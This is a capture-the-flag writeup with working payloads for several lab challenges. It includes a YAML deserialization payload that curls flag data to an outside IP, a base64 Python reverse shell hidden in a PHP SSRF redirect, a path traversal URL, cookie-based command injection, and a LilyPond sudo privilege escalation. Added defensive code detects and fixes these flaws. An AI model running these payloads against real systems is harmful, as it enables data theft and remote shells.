🪖ARCENT Best Cyber Warrior 2023

Quick challenge writeups for the CTF to explain exploitation.

CyberCompose

Vulnerable to the YAML load code execution issue documented by Rapid7: https://www.rapid7.com/db/modules/exploit/multi/fileformat/nodejs_js_yaml_load_code_exec/

Payload:

!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']

Confuser

Vulnerable to https://github.com/advisories/GHSA-ffqj-6fqr-9h24

Intruder

  • It was a hassle setting up my own HTTPS server for it, and I couldn't use self-signed certs because the insecure option was not enabled on the vulnerable web server.

  • I was able to get YAML deserialization working with this PHP redirect, which made the SSRF and the exploit work:

<?php  header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>
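Both CyberCompose and Intruder turn on the same two defender-side checks: a YAML document from an untrusted source must be screened (or loaded with a safe loader) before it reaches a parser that honours language-specific tags, and a fetcher that follows redirects must refuse targets on loopback or private networks. The following is an added example, not code from the writeup or from the challenges; the function names, the sample redirect and the harmless stand-in document (os.getcwd instead of a real payload) are all constructed for it. It treats a Location header the way a hardened fetcher would: flag internal hosts, and decode base64 path segments to look for PyYAML tags that instantiate arbitrary Python objects.

```python
import base64
import binascii
import ipaddress
from urllib.parse import unquote, urlsplit

# PyYAML tag families that make the unsafe loaders build arbitrary objects or
# look up arbitrary callables. These are documented PyYAML tag names.
DANGEROUS_YAML_TAGS = ("!!python/object", "!!python/name", "!!python/module")

# Constructed sample (not the challenge payload): a redirect to the internal YAML
# endpoint carrying a base64 document that uses a dangerous tag harmlessly.
SAMPLE_DOC = "!!python/object/apply:os.getcwd []"
SAMPLE_LOCATION = "http://127.0.0.1:5000/yaml/" + base64.b64encode(SAMPLE_DOC.encode()).decode()
# Constructed benign redirect for comparison: public host, plain key/value document.
BENIGN_LOCATION = "https://example.com/yaml/" + base64.b64encode(b"name: test").decode()


def find_dangerous_tags(doc):
    """Pre-parse check: which dangerous tags appear in a YAML text."""
    return [tag for tag in DANGEROUS_YAML_TAGS if tag in doc]


def decode_path_segment(segment):
    """Best-effort base64 decode of one URL path segment; None if it is not valid base64."""
    try:
        return base64.b64decode(unquote(segment), validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def host_is_internal(hostname):
    """True for loopback, private, link-local or unspecified addresses and 'localhost'."""
    try:
        addr = ipaddress.ip_address(hostname)
    except ValueError:
        # Not an IP literal. A real fetcher must resolve the name and check every
        # returned address, because DNS can point a public name at an internal IP.
        return hostname.lower() == "localhost"
    return addr.is_loopback or addr.is_private or addr.is_link_local or addr.is_unspecified


def inspect_redirect(location):
    """Return findings for a redirect target before an SSRF-prone fetcher follows it."""
    findings = []
    parts = urlsplit(location)
    if parts.scheme not in ("http", "https"):
        findings.append(f"unexpected scheme {parts.scheme!r}")
    if parts.hostname and host_is_internal(parts.hostname):
        findings.append(f"redirect to internal host {parts.hostname}")
    for segment in parts.path.split("/"):
        decoded = decode_path_segment(segment)
        if decoded is None:
            continue
        for tag in find_dangerous_tags(decoded):
            findings.append(f"base64 path segment carries YAML tag {tag}")
    return findings


if __name__ == "__main__":
    for loc in (SAMPLE_LOCATION, BENIGN_LOCATION):
        print(loc, "->", inspect_redirect(loc) or "ok")
```

The tag scan is a screen, not a substitute for the real fix, which is to load untrusted YAML with yaml.safe_load (or js-yaml's default safe schema) so that application-specific tags are rejected by the parser itself; the host check belongs in the fetcher's redirect handler, applied to every hop.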

S7R34M5

from scapy.all import IP, UDP, Raw, rdpcap
import sys

# Take the pcap file name from the first command-line argument
if len(sys.argv) != 2:
    sys.exit(f"usage: {sys.argv[0]} <capture.pcap>")
file = sys.argv[1]

# Define the source and destination IP addresses of the stream to extract
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"

# Define an array to store the data bytes
data_array = []

# rdpcap parses the whole capture into memory; no separate open() is needed
packets = rdpcap(file)

def process_packet(packet):
    # Find all UDP packets from source_ip to destination_ip that carry a payload,
    # and add their raw payload bytes to the array (packets without a Raw layer
    # would otherwise raise an IndexError)
    if (packet.haslayer(IP) and packet.haslayer(UDP) and packet.haslayer(Raw)
            and packet[IP].src == source_ip and packet[IP].dst == destination_ip):
        data_array.append(packet[Raw].load)

# Process each packet in the pcap file
for packet in packets:
    process_packet(packet)

# Merge the array and print the reassembled stream; replace undecodable bytes instead of crashing
data = b''.join(data_array)
print(data.decode('utf-8', errors='replace'))
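The script above relies on scapy to do the dissection. The following is an added example (not part of the writeup) that performs the same extraction, one direction of a UDP flow reassembled from a classic pcap, with only the standard library, so it shows what is actually being decoded at each layer: the pcap record header, the Ethernet type, the IPv4 header length and protocol, and the UDP length field. The addresses are the ones used in the writeup; the capture it runs on is constructed in memory and includes a reverse-direction datagram, an ARP frame and an empty datagram to show that each is skipped.

```python
import socket
import struct

PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"   # 0xa1b2c3d4 stored little-endian
PCAP_MAGIC_BE = b"\xa1\xb2\xc3\xd4"
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_UDP = 17


def iter_pcap_frames(data):
    """Yield the link-layer bytes of each record of a classic (non-pcapng) capture."""
    if data[:4] == PCAP_MAGIC_LE:
        order = "<"
    elif data[:4] == PCAP_MAGIC_BE:
        order = ">"
    else:
        raise ValueError("not a classic pcap file")
    # version major/minor, thiszone, sigfigs, snaplen, linktype
    linktype = struct.unpack(order + "HHiIII", data[4:24])[5]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        off += 16
        frame = data[off:off + incl_len]
        if len(frame) < incl_len:
            break  # capture truncated in the middle of a record
        off += incl_len
        yield frame


def parse_udp(frame):
    """Return (src_ip, dst_ip, payload) for an Ethernet/IPv4/UDP frame, else None."""
    if len(frame) < 14 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    if len(ip) < 20 or ip[0] >> 4 != 4:
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != IPPROTO_UDP or total_len < ihl + 8 or len(ip) < total_len:
        return None
    udp = ip[ihl:total_len]                    # drops any Ethernet padding
    udp_len = struct.unpack("!H", udp[4:6])[0]
    if udp_len < 8 or udp_len > len(udp):
        return None
    return socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]), udp[8:udp_len]


def extract_udp_stream(pcap_bytes, src_ip, dst_ip):
    """Concatenate the payloads of all UDP datagrams sent from src_ip to dst_ip."""
    chunks = []
    for frame in iter_pcap_frames(pcap_bytes):
        parsed = parse_udp(frame)
        if parsed and parsed[0] == src_ip and parsed[1] == dst_ip and parsed[2]:
            chunks.append(parsed[2])
    return b"".join(chunks)


# --- constructed sample capture (checksums left zero; fine for an offline example) ---
def build_udp_frame(src_ip, dst_ip, sport, dport, payload):
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 1, 0, 64, IPPROTO_UDP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + udp
    return bytes(12) + struct.pack("!H", ETHERTYPE_IPV4) + ip      # zero MACs


def build_pcap(frames):
    out = [PCAP_MAGIC_LE + struct.pack("<HHiIII", 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


SRC, DST = "192.168.245.129", "192.168.1.7"
SAMPLE_PCAP = build_pcap([
    build_udp_frame(SRC, DST, 40000, 9999, b"flag{"),
    build_udp_frame(DST, SRC, 9999, 40000, b"ack"),        # reverse direction: ignored
    bytes(12) + struct.pack("!H", 0x0806) + bytes(28),     # ARP frame: not IPv4
    build_udp_frame(SRC, DST, 40000, 9999, b""),           # empty datagram: nothing to add
    build_udp_frame(SRC, DST, 40000, 9999, b"d3m0}"),
])

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    sys.stdout.buffer.write(extract_udp_stream(blob, SRC, DST) + b"\n")
```

Run it with a capture path to process a real file, or with no arguments to process the embedded sample. Bounds are checked against both the IPv4 total length and the UDP length field, so a malformed or truncated record is skipped rather than raising.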

LeakyPond

Initial Access

Path traversal: /vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../var/www/html/debugger_infra-temp.php
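The File parameter is handed straight to the filesystem, so a chain of ../ walks out of the intended directory. Added example (not from the writeup or the vulnerable library): a detection that runs over access-log lines and catches plain and double-percent-encoded traversal in that parameter, next to the server-side fix, which resolves the requested path and refuses anything that does not stay under the allowed base directory. The log lines, the upload directory and the function names are constructed for the example; the request path is the one from the writeup.

```python
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines: one legitimate request, one plain traversal,
# one double-encoded traversal (%252e is '%2e' after one decode, '.' after two).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Oct/2023:10:00:00 +0000] "GET /vendor/nuovo/spreadsheet-reader/test.php?File=reports/2023.xlsx HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Oct/2023:10:00:07 +0000] "GET /vendor/nuovo/spreadsheet-reader/test.php?File=../../../../etc/passwd HTTP/1.1" 200 1834',
    '10.0.0.9 - - [12/Oct/2023:10:00:12 +0000] "GET /vendor/nuovo/spreadsheet-reader/test.php?File=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1834',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
UPLOAD_DIR = "/var/www/html/uploads"   # constructed base directory for the fix


def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so doubly encoded sequences are caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_traversal(param_value):
    """Detection: does the value try to climb out of its directory or smuggle a NUL byte?"""
    decoded = fully_unquote(param_value).replace("\\", "/")
    return ".." in decoded.split("/") or decoded.startswith("/") or "\x00" in decoded


def flag_requests(log_lines):
    """Return the File= values in the log that look like traversal attempts."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == "File" and looks_like_traversal(value):
                hits.append(value)
    return hits


def safe_join(base_dir, user_path):
    """Fix: resolve the requested path and return it only if it stays under base_dir, else None."""
    if os.path.isabs(user_path) or "\x00" in user_path:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


if __name__ == "__main__":
    print("flagged:", flag_requests(SAMPLE_LOG))
    for requested in ("reports/2023.xlsx", "../../../../etc/passwd"):
        print(requested, "->", safe_join(UPLOAD_DIR, requested))
```

parse_qsl decodes one layer of percent-encoding, which is what the web server's own parser does; the detector decodes again so that a double-encoded ../ is still recognised, while safe_join works on the final resolved path and so does not depend on spotting any particular encoding.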

Debug mode was still enabled and the value of the debug cookie was passed to system().

RCE:

GET /index.php?debug_infra=1 HTTP/1.1
Host: wcom5p6v45jax3g1w93xkxdt7vr86dv91gp0c43l-web.cybertalentslabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: debug=ls
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
X-PwnFox-Color: blue

Used Ivan Sincek's PHP reverse shell for a more stable environment.

Priv Esc

$ echo "JSBjb21iaW5lcyBzaGVsbCBleGVjdXRpb24gd2l0aCBmaWxlIHJlYWRpbmcKJSB0byBnZXQgc29tZXRoaW5nIGxpa2UgYW4gaW50ZXJhY3RpdmUgc2hlbGwKIyhkZWZpbmUgcyAiIikKIyhzeXN0ZW0gImNhdCAvcm9vdC9mbGFnKiA+IC90bXAvZmxhZ3oiKQojKGxldCogICgoZiAob3Blbi1pbnB1dC1maWxlICIvdG1wL3F3ZXJ0eWFzZGYiKSkKICAgICAgICAoYyAjXHNwYWNlKSkKICAod2hpbGUgKG5vdCAoZW9mLW9iamVjdD8gYykpCiAgKHNldCEgcyAoc3RyaW5nLWFwcGVuZCBzIChzdHJpbmcgYykpKQogIChzZXQhIGMgKHJlYWQtY2hhciBmKSkpKQpcbmV3IFN0YWZmIDw8e2deI3MKfT4+" | base64 -d > test.ly
$ sudo /opt/lilypond/bin/lilypond test.ly
Processing `test.ly'
Parsing...
test.ly:1: warning: no \version statement found, please add

\version "2.23.82"

for future compatibility
Interpreting music...
Preprocessing graphical objects...
Finding the ideal number of pages...
Fitting music on 1 page...
Drawing systems...
Converting to `test.pdf'...
Success: compilation successfully completed
$ ls
flagz
qwertyasdf
test.ly
test.pdf
$ cat flagz
flag{ZAE324RTHJNBVCXWQZ34568UHBVCX}
$
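The privilege escalation works because sudo allows lilypond, and a .ly file can contain Guile Scheme (the #(...) forms in the decoded file above), so sudo access to lilypond is sudo access to a root shell. The page does not show the sudoers rule itself. Added example, not from the writeup: a small sudoers auditor that parses the common user/host/runas/command rule form and flags rules granting ALL or a program that evaluates code embedded in its input; the sudoers content it parses is a constructed sample, and the watch-list is an assumption (a real audit would maintain its own).

```python
import re

# Constructed sample sudoers fragment; the challenge's real rule is not shown in the writeup.
SAMPLE_SUDOERS = """\
# /etc/sudoers.d/lilypond (constructed sample)
Defaults env_reset
www-data ALL=(root) NOPASSWD: /opt/lilypond/bin/lilypond
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
deploy   ALL=(ALL) ALL
"""

# Assumed watch-list: programs that run code contained in the files they are given.
# lilypond is here because .ly input may embed Guile Scheme, which is how this box fell.
CODE_EVALUATING = {"lilypond", "guile", "python3", "perl"}

RULE_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG_RE = re.compile(r"^(?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*)+")


def parse_sudoers(text):
    """Return one dict per command spec: user, runas, nopasswd flag and the command string."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        user, _host, runas, cmd_part = match.groups()
        for spec in cmd_part.split(","):
            spec = spec.strip()
            tags = TAG_RE.match(spec)
            rules.append({
                "user": user,
                "runas": runas or "root",
                "nopasswd": bool(tags and "NOPASSWD" in tags.group(0)),
                "command": TAG_RE.sub("", spec),
            })
    return rules


def audit_sudoers(text):
    """Findings for rules that amount to unrestricted code execution as the runas user."""
    findings = []
    for rule in parse_sudoers(text):
        cmd = rule["command"]
        if cmd == "ALL":
            findings.append(f"{rule['user']} may run any command as {rule['runas']}")
            continue
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if prog in CODE_EVALUATING:
            msg = f"{rule['user']} may run {prog} as {rule['runas']}"
            if rule["nopasswd"]:
                msg += " without a password"
            findings.append(msg + "; it evaluates code embedded in its input")
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

The parser deliberately handles only the plain rule form (no aliases, no line continuations); for a real estate, run sudo -l for the service accounts and feed the output to the same watch-list, and replace a rule like the lilypond one with a wrapper that runs the program unprivileged, since restricting its arguments does not stop code in the input file.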

SayingPlease

Simply change the base64-encoded authentication token from user to admin and the index.php page will display the flag.
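The token is accepted because base64 is an encoding, not an integrity check: anyone can decode it, edit the role and re-encode. Added example, not from the writeup or the challenge: the weak pattern beside its hardened form, where the server signs the body with HMAC-SHA256 and verifies it in constant time, so that the same edit (swap the role, keep the old signature) is rejected. The secret key, claim names and sample tokens are constructed for the example.

```python
import base64
import hashlib
import hmac
import json

# Constructed secret for the example; a real service loads this from a secret store, never from source.
SECRET_KEY = b"example-only-secret"

# Constructed unsigned tokens in the style the challenge used (plain base64 of JSON).
UNSIGNED_USER_TOKEN = base64.b64encode(b'{"user":"alice","role":"user"}').decode()
UNSIGNED_ADMIN_TOKEN = base64.b64encode(b'{"user":"alice","role":"admin"}').decode()


def _b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_claims(claims):
    # Canonical JSON so the signed bytes are deterministic for a given claim set
    return _b64url(json.dumps(claims, sort_keys=True, separators=(",", ":")).encode())


def role_from_unsigned_token(token):
    """The weak pattern from the challenge: trust whatever the base64 JSON says."""
    return json.loads(base64.b64decode(token))["role"]


def issue_token(claims, key=SECRET_KEY):
    """Hardened form: body plus an HMAC-SHA256 tag over the body."""
    body = _encode_claims(claims)
    return body + "." + _b64url(hmac.new(key, body.encode(), hashlib.sha256).digest())


def verify_token(token, key=SECRET_KEY):
    """Return the claims only if the tag matches; None for any tampered or malformed token."""
    body, sep, sig = token.partition(".")
    if not sep:
        return None
    expected = _b64url(hmac.new(key, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):      # constant-time comparison
        return None
    try:
        return json.loads(_unb64url(body))
    except ValueError:                               # bad base64 or bad JSON
        return None


def swap_role(signed_token, new_role):
    """Apply the challenge's edit to a signed token (new body, old tag); used to show it is rejected."""
    body, _, sig = signed_token.partition(".")
    claims = json.loads(_unb64url(body))
    claims["role"] = new_role
    return _encode_claims(claims) + "." + sig


if __name__ == "__main__":
    print("unsigned, edited:", role_from_unsigned_token(UNSIGNED_ADMIN_TOKEN))
    token = issue_token({"user": "alice", "role": "user"})
    print("signed, valid:   ", verify_token(token))
    print("signed, edited:  ", verify_token(swap_role(token, "admin")))
```

Role should ideally not live in the client token at all but be looked up server-side from the user identity; where it must, a signed (or, better, server-stored opaque) token with an expiry is the minimum, and the compare must be constant-time as above.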
